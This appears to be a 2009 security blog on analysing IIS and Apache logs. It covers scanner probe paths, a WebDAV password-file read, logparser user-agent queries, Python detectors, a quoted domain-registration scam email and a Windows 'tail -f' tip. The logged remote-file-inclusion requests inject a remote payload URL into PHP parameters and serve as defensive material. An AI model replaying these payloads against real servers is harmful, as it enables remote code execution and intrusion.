Include the folders that scanners normally probe, so we can see what attack they are attempting:

  • /user/soapCaller.bs
  • /roundcube/
  • /webmail/
  • /abc.php
  • /pp/anp.php
  • /thisdoesnotexistahaha.php
  • /cmd.php
  • /portal/cacti/cmd.php
  • /portal/cmd.php
  • /stats/cmd.php

Other bot scanner

If we try to access a folder protected with "Integrated Windows Authentication" and we do not know the user name and password, we get this response from the server:

HTTP 401.2 – Unauthorized: Logon failed due to server configuration Servicios de Internet Information Server

And on the server we get this log entry:

2009-05-28 20:45:09 192.168.1.34 192.168.1.33 GET /php - 401 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) -

Exploiting the WebDAV vulnerability, we gain access:

2009-05-28 17:37:42 192.168.1.34 192.168.1.33 GET /p/hp/password.txt - 200 cadaver/0.23.2+neon/0.28.0 -

We manage to read the contents of password.txt.

To exploit the vulnerability we modified Cadaver.

libwww-perl/5.814

May 26, 2009

Entry that running a Perl script leaves in the log:

libwww-perl/5.814

This robot's mission: http://robotgenius.net/company/index.jsp

With this query we can see the different cs(User-Agent) values that appear in our logs:

logparser "SELECT [cs(User-Agent)], COUNT(*) AS EXPR1 FROM 'C:\WINDOWS\system32\LogFiles\W3\*' GROUP BY [cs(User-Agent)] ORDER BY [cs(User-Agent)] desc" -i:IISW3C -o:DATAGRID

If we want to locate a particular User-Agent:

logparser "SELECT * FROM 'C:\WINDOWS\system32\LogFiles\W3\*' WHERE cs(User-Agent) like '%robotgenius%'" -i:IISW3C -o:DATAGRID
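As an added example (not from the original post), the same grouping by cs(User-Agent) done in Python over constructed IIS W3C lines shaped like the entries quoted above, plus a pass that flags the scanner paths listed at the top of the page, tool user-agents such as cadaver and libwww-perl, and 401 failures. The field layout (date, time, c-ip, s-ip, method, uri-stem, uri-query, status, user-agent, referer) is assumed from the quoted lines; SAMPLE_LOG and its client IPs are constructed.

```python
from collections import Counter

# Constructed IIS W3C-style lines modelled on the entries quoted in this post:
# date time c-ip s-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent) cs(Referer)
SAMPLE_LOG = """\
2009-05-28 20:45:09 192.168.1.34 192.168.1.33 GET /php - 401 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) -
2009-05-28 17:37:42 192.168.1.34 192.168.1.33 GET /p/hp/password.txt - 200 cadaver/0.23.2+neon/0.28.0 -
2009-05-28 17:40:01 10.0.0.7 192.168.1.33 GET /portal/cacti/cmd.php - 404 libwww-perl/5.814 -
2009-05-28 17:40:02 10.0.0.7 192.168.1.33 GET /roundcube/ - 404 libwww-perl/5.814 -
2009-05-28 18:02:10 10.0.0.9 192.168.1.33 GET /index.html - 200 Mozilla/5.0+(Windows;+U) -
"""

# Paths the scanners described in this post probe for
SCANNER_PATHS = {"/user/soapCaller.bs", "/roundcube/", "/webmail/", "/abc.php",
                 "/pp/anp.php", "/thisdoesnotexistahaha.php", "/cmd.php",
                 "/portal/cacti/cmd.php", "/portal/cmd.php", "/stats/cmd.php"}
# WebDAV client and scripted HTTP library user-agents seen in the post
TOOL_AGENTS = ("cadaver", "libwww-perl")

FIELDS = ["date", "time", "c_ip", "s_ip", "method", "uri_stem", "uri_query",
          "status", "user_agent", "referer"]

def parse_w3c(text):
    """Split each non-empty, non-comment line into the assumed field layout."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if len(parts) != len(FIELDS):
            continue  # skip lines that do not match the assumed layout
        entries.append(dict(zip(FIELDS, parts)))
    return entries

def user_agent_counts(entries):
    """Equivalent of the GROUP BY cs(User-Agent) query: agent -> hit count."""
    return Counter(e["user_agent"] for e in entries)

def suspicious(entries):
    """Return (c_ip, uri_stem, reasons) for scanner paths, tool agents and 401s."""
    hits = []
    for e in entries:
        reasons = []
        if e["uri_stem"] in SCANNER_PATHS:
            reasons.append("known scanner path")
        if e["user_agent"].lower().startswith(TOOL_AGENTS):
            reasons.append("tool user-agent")
        if e["status"] == "401":
            reasons.append("auth failure")
        if reasons:
            hits.append((e["c_ip"], e["uri_stem"], ", ".join(reasons)))
    return hits
```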

WinProxy 1.5.x : User’s Manual : http://www.winproxy.cz/download/WinProxy_EN.pdf

Log entry:

winproxy/1.0+(CP/M;+16-bit) 2

RFI scanner in Perl

May 26, 2009

Scanner detected in the logs: http://site.mynet.com/senkofiles/perlrfiscanner.txt

- - [26/May/2009:09:22:15 +0200] "GET /Forums/admin/index.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1" 404 325
- - [26/May/2009:09:22:15 +0200] "GET /forum/impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1" 404 328
- - [26/May/2009:09:22:16 +0200] "GET /impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1" 404 322
- - [26/May/2009:09:22:16 +0200] "GET /forums/impex/ImpExData.php?systempath=http://xxx/appserv/t.txt? HTTP/1.1" 404 329
- - [26/May/2009:09:22:16 +0200] "GET /webcalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 339
- - [26/May/2009:09:22:16 +0200] "GET /WebCalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 339
- - [26/May/2009:09:22:16 +0200] "GET /cacti/include/config_settings.php?config[include_path]=http://xxx/appserv/t.txt? HTTP/1.1" 404 336
- - [26/May/2009:09:22:17 +0200] "GET /webcalendar/ws/get_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 335
- - [26/May/2009:09:22:17 +0200] "GET /calendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 336
- - [26/May/2009:09:22:17 +0200] "GET /calendar/ws/get_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 332
- - [26/May/2009:09:22:17 +0200] "GET /kalendar/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 336
- - [26/May/2009:09:22:17 +0200] "GET /webcal/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 334
- - [26/May/2009:09:22:17 +0200] "GET /cal/tools/send_reminders.php?includedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 331
- - [26/May/2009:09:22:18 +0200] "GET /appserv/main.php?appserv_root=http://xxx/appserv/t.txt? HTTP/1.1" 404 319
- - [26/May/2009:09:22:18 +0200] "GET /includes/db_adodb.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1" 404 324
- - [26/May/2009:09:22:18 +0200] "GET /includes/session.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1" 404 323
- - [26/May/2009:09:22:18 +0200] "GET /modules/projects/gantt.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1" 404 329
- - [26/May/2009:09:22:18 +0200] "GET /modules/projects/gantt2.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1" 404 330
- - [26/May/2009:09:22:19 +0200] "GET /modules/projects/vw_files.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1" 404 332
- - [26/May/2009:09:22:19 +0200] "GET /modules/admin/vw_usr_roles.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1" 404 333
- - [26/May/2009:09:22:19 +0200] "GET /modules/public/calendar.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1" 404 330
- - [26/May/2009:09:22:19 +0200] "GET /modules/public/date_format.php?baseDir=http://xxx/appserv/t.txt? HTTP/1.1" 404 333
- - [26/May/2009:09:22:19 +0200] "GET /yabbse/Sources/Packages.php?sourcedir=http://xxx/appserv/t.txt? HTTP/1.1" 404 330
- - [26/May/2009:09:22:20 +0200] "GET /yappa-ng/src/index_overview.inc.php?config[path_src_include]=http://xxx/appserv/t.txt? HTTP/1.1" 404 338
- - [26/May/2009:09:22:20 +0200] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1" 404 348
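An added example, not part of the original post: a Python pass over Apache-style access-log lines constructed in the shape of the requests above. It flags any query parameter whose value is itself a remote URL (the RFI pattern behind includedir=, systempath= and phpbb_root_path=), rates a trailing "?" on that value as high confidence, and counts the hosts serving the include payload. The client IPs and the legitimate ref= line are constructed, the latter to show the low-confidence false positive a bare "URL in a parameter" rule produces.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache access-log lines modelled on the entries quoted in this post
# (the scanner's payload host is masked as "xxx" in the post; IPs are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [26/May/2009:09:22:15 +0200] "GET /Forums/admin/index.php?phpbb_root_path=http://xxx/appserv/t.txt? HTTP/1.1" 404 325
10.0.0.5 - - [26/May/2009:09:22:16 +0200] "GET /cacti/include/config_settings.php?config[include_path]=http://xxx/appserv/t.txt? HTTP/1.1" 404 336
10.0.0.5 - - [26/May/2009:09:22:18 +0200] "GET /modules/projects/gantt.php?dPconfig[root_dir]=http://xxx/appserv/t.txt? HTTP/1.1" 404 329
10.0.0.9 - - [26/May/2009:09:30:00 +0200] "GET /index.php?page=about&ref=http://www.example.com/ HTTP/1.1" 200 5120
10.0.0.9 - - [26/May/2009:09:31:12 +0200] "GET /images/logo.png HTTP/1.1" 200 2048
"""

# ip ident user [timestamp] "method target protocol" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def parse_access_log(text):
    """Parse Apache-style lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status, size = m.groups()
        path, _, query = target.partition("?")
        entries.append({"ip": ip, "ts": ts, "method": method, "path": path,
                        "params": parse_qsl(query, keep_blank_values=True),
                        "status": status, "size": size})
    return entries

def rfi_attempts(entries):
    """Flag requests where a query parameter's value is itself a remote URL.
    Confidence is 'high' when the value ends in '?', the terminator RFI scanners
    append so that whatever the script concatenates becomes a harmless query string."""
    hits = []
    for e in entries:
        for name, value in e["params"]:
            if value.lower().startswith(REMOTE_SCHEMES):
                confidence = "high" if value.endswith("?") else "low"
                hits.append((e["ip"], e["path"], name, value, confidence))
    return hits

def include_hosts(hits):
    """Hosts serving the include payload: candidates for blocking or for hunting in other logs."""
    return Counter(urlsplit(h[3]).hostname for h in hits)
```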

Domain name scams

May 22, 2009

A new harassment message about the domain has arrived:

(If you are NOT CEO, please forward this to your CEO or your legal department, because this is urgent. Thanks.)

Dear CEO,

We received a formal application from a person called Peter Alldis, who is applying to register "Dominio" as their domain names and Internet brand in Hong Kong and also in Asia on May 22, 2009. During our auditing procedure we find out that the alleged Peter Alldis has no trade mark, brand nor patent even similar to that word. As authorized anti-cybersquatting organization we hereby suspect the alleged Peter Alldis to be a domain or trademark grabber. Hence we need your confirmation for two things. First of all, whether this alleged Peter Alldis is your business partner or distributor in Asia.

Secondly, whether you are interested in registering these domains and internet brand instead of that alleged person. (The alleged Peter Alldis will be entitled to obtain a domain not needed by original trademark owner.)

If you are not in charge of this please forward this email to appropriate dept.

This is a letter for confirmation. If the mentioned third party is your business partner or distributor in Asia and you are not interested in registering these domains and internet brand, please DO NOT reply. We will automatically confirm application from your business partner after this audit procedure.

Best Regards,

Eddy

Registration Commissioner

Mail: eddy@worldwidesolution.org

Web: www.worldwidesolution.org

This does not look good at all…

With these steps we can use the "tail -f" command on Windows Server 2003:

  1. Install Copssh (http://www.openssh.org/index.html)
  2. Add a link to where the LogFiles are (open a shell and run: ln -s /cygdrive/c/WINDOWS/System32/LogFiles logs)
  3. Run tail -f